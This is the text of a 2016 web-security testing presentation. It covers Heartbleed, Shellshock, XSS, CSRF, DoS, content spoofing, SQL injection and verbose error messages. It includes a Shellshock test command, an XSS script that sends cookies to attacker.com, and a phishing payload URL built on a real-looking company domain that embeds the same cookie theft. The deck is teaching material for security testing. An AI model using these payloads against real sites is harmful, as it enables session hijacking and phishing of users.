Security_Testing_Presentation

©2012 Trimble Navigation Limited©2012 Trimble Navigation Limited
Web Application Vulnerabilities
&
Security Testing
18 Jul 2016
~ Rajil

©2012 Trimble Navigation Limited
Objective
The primary objective is to give a brief introduction of critical &
potential vulnerabilities in a web application.
Over view of security testing techniques to detect for
underlying vulnerabilities or security holes in a web
applications.
Web Application Vulnerabilities & Security Testing

We do security testing for
 Confidentiality
 Privileges Escalation.
 Data Integrity

Tools Used
 Nmap
 Zed Attack Proxy (ZAP)
 Metasploit

Demo Systems
 CentOS Machine
 Windows 2008 Server
 Kali Linux (Attacker)

 Heart bleed
 Shell Shock
 Cross Site Scripting (XSS)
 Cross Site Request Forgery (CSRF)
 SQL Injection & Error Messages
 DoS & Buffer Overflow
 Content Spoofing

Heart bleed
Heart bleed is a security bug in openSSL cryptography library, which is
widely used to implement Transport Security Layer Protocol heartbeat
functionality; this is because of improper input validation for boundary
check. The vulnerability is classified as a buffer over-read, a situation
where more data can be read than should be allowed. The bug name
has been derived from "Heartbeat".
It was publicly disclosed in April 2014.

Heart Bleed

Heart Bleed
OpenSSL 1.0.1 through 1.0.1f are vulnerable.
 OpenSSL 1.0.1g was released to address this vulnerability
 List of vulnerable websites
https://zmap.io/heartbleed/
http://www.tjkelly.com/blog/heartbleed-website-list/
 To test online
https://sslanalyzer.comodoca.com/heartbleed.html
https://filippo.io/Heartbleed/

Heart Bleed
Leaked data from vulnerable website

Shellshock
Shell shock is also known as Bash Door, it was disclosed on 24th Sept 2014.
Any webserver running on vulnerable Linux or UNIX machines will allow the
attacker to execute arbitrary shell commands on the target machine.
Windows OS is not vulnerable to this.

Shellshock

Shellshock
To test if the system is vulnerable, issue the below command in Unix or Linux
machines.
env x='() { :;}; echo vulnerable' bash -c 'echo hello'

Cross Site Scripting (XSS)
This is a hacking technique that leverages vulnerabilities in the code of a web
application to allow an attacker to send malicious content from an end-user
and collect some type of data from the victim.
XSS enables the attackers to inject client-side script into Web pages viewed by
other users.
XSS allows attackers to execute script in the victim’s browser which can hijack
user sessions, or redirect the user to malicious sites.
XSS leads to session hijacking.
There two types of XSS.
Stored XSS
Reflected XSS

Cookie Stealing:
<script>document.location='http://attacker.com/tinylogger.php?cooki
e='.concat(escape(document.cookie));</script>

Cross Site Request Forgery (CSRF)
A CSRF attack forces a logged-on victim’s browser to send a
forged HTTP request, including the victim’s session cookie and
any other authentication information, to a vulnerable web
application. This allows the attacker to force the victim’s
browser to generate requests; the vulnerable application thinks
these requests are legitimate.

Cross Site Request Forgery (CSRF)
 Attacker will send a malicious link to the victim by some means like social websites, chat
or email. This link may seems very interesting to the victim.
 Once the victim clicked this link, then without his knowledge, browser sends forged
requests to the server to perform some action.

Denial Of Service Attacks (DoS or DDoS)
 This attack is an attempt to make a machine or network resource
unavailable to its intended users.
 One common method of attack involves saturating the target
machine with external communications requests, such that it cannot
respond to legitimate traffic, or responds so slowly.
 This attack consumes the target computer all resources so that it can
no longer provide its intended service.
 A distributed denial-of-service (DDoS) is where the attack source is
more than one, often thousands of, unique IP addresses.

Types of DoS Attacks
 ICMP flood
 SYN flood
 Ping flood (Ping of Death)
 Peer-to-peer attacks
 Application Level Floods

Application Level DoS Attack
Some of DoS attacks rely on software related exploits such as buffer
overflows. These attacks Cause the application to fill the disk space or
consume all available memory or CPU cycles.
Buffer overflow
While a program writing data in to a buffer, over runs buffer’s
boundary and overwrites the adjacent memory locations. This may
result in erratic program behavior, including memory access errors,
incorrect results, or a crash.

Content Spoofing
Content spoofing, also referred to as content injection or virtual
defacement, is an attack targeting a user made possible by injection
vulnerability in a web application. When an application does not
properly handle user supplied data, an attacker can supply content to a
web application, typically via a parameter value, that is reflected back
to the user. This presents the user with a modified page under the
context of the trusted domain.
This attack is typically used as in conjunction with phishing attacks.

Content Spoofing
Sample Phishing email

Content Spoofing
Once the victim clicked on the malicious links from that email, it will
display the spoofed content in the vulnerable application.
Payload
https://eugmrel.road.com/apps/apm/jspServer/PasswordAlert.jsp?msg=<H1><b>Some
malicious activity detected on your acount, kindly <a
href="https://eugmrel.road.com/apps/apm/jspServer/PasswordAlert.jsp?msg=<script>doc
ument.location='http://attacker.com/tinylogger1.php?cookie='.concat(escape(document.co
okie));</script>">Click Here</a> to change the password immediately !!!</b></h1>

SQL Injection
SQL injection is a technique where malicious users can inject SQL
commands into an SQL statement, via web page input. Injected
SQL commands can alter SQL statement and compromise the
security of a web application.

SQL Injection

Error Messages
Revealing system data or debugging information helps an adversary
learn about the system and form a plan of attack. An information leak
occurs when system data or debugging information leaves the program
through an output stream or logging function.
Error Message 1:
java.sql.SQLSyntaxErrorException: ORA-00942: Table or View doesn’t exist
at oracle.jdbc.driver.SQLStateMapping.newSQLException(SQLStateMapping.java:91)
at oracle.jdbc.driver.DatabaseError.newSQLException(DatabaseError.java:112)
at oracle.jdbc.driver.DatabaseError.throwSqlException(DatabaseError.java:173)
at oracle.jdbc.driver.T4CTTIoer.processError(T4CTTIoer.java:455)
at oracle.jdbc.driver.T4C8Oall.receive(T4C8Oall.java:1030)
at oracle.jdbc.driver.T4CPreparedStatement.doOall8(T4CPreparedStatement.java:194)
at oracle.jdbc.driver.T4CPreparedStatement.executeForDescribe(T4CPreparedStatement.java:785)
at oracle.jdbc.driver.T4CPreparedStatement.executeMaybeDescribe(T4CPreparedStatement.java:860)
at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:1186)

Error Messages
Error Message 2:
java.sql.SQLException: ORA-12899: value too large for column
"ROVER"."DRIVER"."DESCRIPTION" (actual: 183, maximum: 80)
at oracle.jdbc.driver.SQLStateMapping.newSQLException(SQLStateMapping.java:70)
at oracle.jdbc.driver.DatabaseError.newSQLException(DatabaseError.java:112)
at oracle.jdbc.driver.DatabaseError.throwSqlException(DatabaseError.java:173)
at oracle.jdbc.driver.T4C8Oall.receive(T4C8Oall.java:1030)
at oracle.jdbc.driver.T4CPreparedStatement.doOall8(T4CPreparedStatement.java:194)

Thank You

Security_Testing_Presentation

More Related Content

What's hot

Viewers also liked

Similar to Security_Testing_Presentation

Security_Testing_Presentation